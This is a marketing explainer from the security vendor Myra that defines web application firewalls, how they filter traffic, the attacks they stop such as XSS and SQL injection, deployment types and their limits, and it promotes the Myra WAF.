Visit us at it-sa in Nuremberg from October 7 to 9. Get your free ticket now!

Security lock

What is a Web Application Firewall (WAF)?

A Web Application Firewall (WAF) is a security solution that filters, monitors, and blocks HTTP and HTTPS traffic to and from a web application. This protects against a wide range of cyberattacks at the application layer – including SQL injection, cross-site scripting, and more.

 

Learn more about the Myra WAF

01

Web Application Firewall (WAF): A Definition

A Web Application Firewall (WAF) sits in front of websites and other application and checks all data going back and forth. It blocks dangerous traffic, like hackers trying to break in, so only safe requests reach the web app. WAFs use rules to spot attacks such as cross-site scripting and SQL injection, helping keep web applications secure. Most WAFs can be set up as software, hardware, or managed cloud services, and their rules are updated to stay ahead of new threats. They make it easier for organizations to meet security standards and protect important data from being stolen.

Code on a monitor

02

How Does a Web Application Firewall (WAF) Work?

A WAF protects web applications from specific cyber attacks. It helps defend against threats like cross-site scripting and SQL injection. It forms a protective wall between the web application and the Internet. Clients that want to reach the web server must first pass through the web application firewall.

When analyzing data, the WAF follows defined rules, known as policies. They are used to filter out harmful traffic. These policies are constantly updated in order to be able to react to various forms of cyber attacks. Basically, there are blocklist and allowlist WAFs:

  • Blocklist WAFs are based on a negative security model and protect against known attacks. The firewall recognizes these attacks and prevents them.

  • Allowlist WAFs, on the other hand, pursue a positive security model. They only allow pre-approved traffic through.


In practice, many WAFs follow a hybrid approach of blocklist and allowlist for optimum security performance.

03

What Dangers Does a Web Application Firewall (WAF) Protect Against?

A web application firewall (WAF) shields web apps from data theft, account takeovers, and malicious acts. Organizations can defend against these attack patterns with a WAF:

Cross-Site Scripting (XSS)

In a cross-site scripting attack, cyber criminals add harmful code to web apps. They exploit security flaws to steal sensitive information, like login details. Interactive websites and applications are particularly susceptible to this. As an upstream protective wall, a web application firewall prevents such malicious access.

SQL-Injection

Cyber criminals use SQL injection attacks to exploit security weaknesses. They insert harmful commands or code through input fields. Dedicated rule sets allow WAF solutions to reliably detect and thwart injection attacks.

OWASP Top 10

OWASP, the non-profit organization, regularly lists the 10 biggest security issues for web applications. Many of the threats on this list can be addressed by a web application firewall.

Zero-Day Exploits

Cyber criminals quickly exploit newly found software vulnerabilities, like Log4Shell or Confluence OGNL. Adapted WAF rules provide immediate protection against these urgent threats. This helps until patches for the vulnerable software are ready and installed.

04 - What Are the Advantages of Using WAF Security?

Companies that use a web application firewall on their website benefit from the following advantages:

Icon WAF

Additional Security Layer for Web Applications

An application-level firewall adds extra protection against unauthorized access. It works best with other security measures.

Icon Features

Closing Security Gaps in Multiple Applications

Webmasters can place a WAF in front of several applications at the same time. This procedure makes it possible to close existing security gaps.

Automatic configuration icon

Protection of Legacy Systems and Applications

Older software that hasn’t been updated or programmed internally can have lasting security vulnerabilities. A WAF offers additional security here.

05

What Types of WAFs Are There?

You can set up a WAF architecture in three ways:

  • Centralized, using a network-based hardware or virtual appliance

  • Host-based, installed directly on the web server

  • As a cloud SaaS solution from a provider

Depending on the type and deployment, the functionality and associated costs differ immensely.

Network-Based WAF

These web application firewalls can be hardware or virtual appliances. They sit in front of or behind web servers. These solutions provide high scalability and performance. However, they need more bandwidth and a strong infrastructure.

Host-Based WAF

Host-based web application firewalls are software or modules. They run on the same server as the web application. They offer a high level of integration and control options, but also require more resources and high maintenance costs.

Cloud SaaS WAF

Many providers now offer software-as-a-service (SaaS) solutions for web application firewalls (WAF). These cloud-hosted options reduce internal effort for companies. They are also flexible and cost-effective. With a managed WAF, the provider handles configuration, maintenance, and operation of the firewall.

Keyboard

06

What can an Application Level Firewall not protect against?

A WAF does not offer total protection, but should always be part of a comprehensive security concept. The following threats cannot be defended against by an application level firewall:

  • Attacks via protocols outside the application level such as DNS, SMTP, Telnet, RDP, SSH or FTP are not identifiable for a WAF solution.

  • DDoS attacks that use malicious traffic to overload web applications and the underlying web infrastructure can only be partially intercepted by a WAF. Dedicated DDoS protection solutions at network, protocol and application level, on the other hand, offer reliable protection.

  • Logic errors in the web applications themselves can lead to unwanted reactions and can be exploited by cyber criminals. Such conceptual programming errors are not recognized by an application level firewall.

07

Which Companies Need a WAF?

Companies with important websites, online portals, or web APIs can gain from a cloud WAF. For those offering credit card payments, using a WAF is essential to meet PCI DSS standards. This is especially true for many e-commerce businesses. Other regulations, like the NIS-2 directive, also push companies to secure their systems with modern tech, often including a WAF for critical online applications. Additionally, organizations using agile development methods depend on WAFs to protect against development errors.

08

What Do Companies Need to Consider When Using a WAF?

A web application firewall is only as good as its filters and configuration. If you make a mistake here or are too restrictive, you can expect problems. Managing a WAF needs skilled IT security specialists. They must have the right resources to handle ongoing firewall management. If companies can't manage this internally, they rely on SaaS solutions from external providers for administrative tasks.

Code on a laptop screen

09

Web Application Firewall (WAF): What You Need to Know

A web application firewall is an important factor in a comprehensive security concept for the company website, business-critical online portals and APIs. The security solution monitors traffic directly at the application level. The solution checks incoming requests and responses from the web server for suspicious patterns. Requests classified as malicious are blocked by the WAF – this ensures that the applications are protected without the need for any adjustments to the application itself.

The Web Application Firewall protects websites from attacks that occur via the Hypertext Transfer Protocol (HTTP/S). These include risks from the OWASP Top 10, zero-day exploits, SQL injection and cross-site scripting (XSS).

To ensure smooth operation, the WAF provider must adapt the security solution to the existing web applications. This is the only way to rule out performance or security problems and complete failures in advance.

The Myra WAF protects your content and applications and integrates seamlessly into your existing IT infrastructure.

Learn more about the Myra WAF

Deep Dive WAF IT-Security

About the author

Björn Greif

Senior Editor

About the author

Björn started his career as an editor at the IT news portal ZDNet in 2006. 10 years and exactly 12,693 articles later, he joined the German start-up Cliqz to campaign for more privacy and data protection on the web. It was then only a small step from data protection to IT security: Björn has been writing about the latest trends and developments in the world of cybersecurity at Myra since 2020.